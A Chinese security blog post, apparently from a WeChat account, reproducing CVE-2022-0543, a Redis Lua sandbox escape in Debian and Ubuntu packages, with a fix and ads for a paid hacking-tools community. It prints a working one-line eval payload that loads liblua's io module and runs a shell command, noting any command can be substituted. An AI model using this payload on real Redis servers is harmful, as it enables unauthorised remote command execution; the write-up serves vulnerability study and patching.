CVE-2022-0543(redis沙盒逃逸)复现 || redis连接工具
2023-3-7 14:11:28 Author: 鹏组安全(查看原文) 阅读量:21 收藏

Redis Lua沙盒绕过命令执行(CVE-2022-0543)

Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。

Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。

该漏洞影响的版本有ubuntu和debian,但是我看其他帖子说centos也存在该漏洞,但是我尝试复现时并未成功

漏洞复现

1、使用redis连接工具连接上数据库

2、使用payload命令执行

打开命令行窗口

执行命令获取id
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

修改命令中id的值可执行任意命令

修复方案

正式修复方案:Lua 初始化的末尾添加package=nil 

临时修复方案:关闭服务

redis连接工具

关注微信公众号鹏组安全

回复redis即可



付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

推荐阅读

干货 | 渗透知识库

工具 | sqlmap图形化工具

审计 | SeaCms代码审计getshell

鹏组安全 | 2022年精华文章汇总

实战 | 记一次授权的渗透测试

应急 | linux实战清理挖矿病毒

免责声明
由于传播、利用本公众号鹏组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号鹏组安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NDU3NDA3OQ==&mid=2247488620&idx=1&sn=f9a0ac3af0d59d1083d6b5535cee42a7&chksm=c01cd8fcf76b51eabfdb2bd07848819f60ee3f93bc88ffd51a0b66c554ac5b082ff8664a7d81#rd
如有侵权请联系:admin#unsafe.sh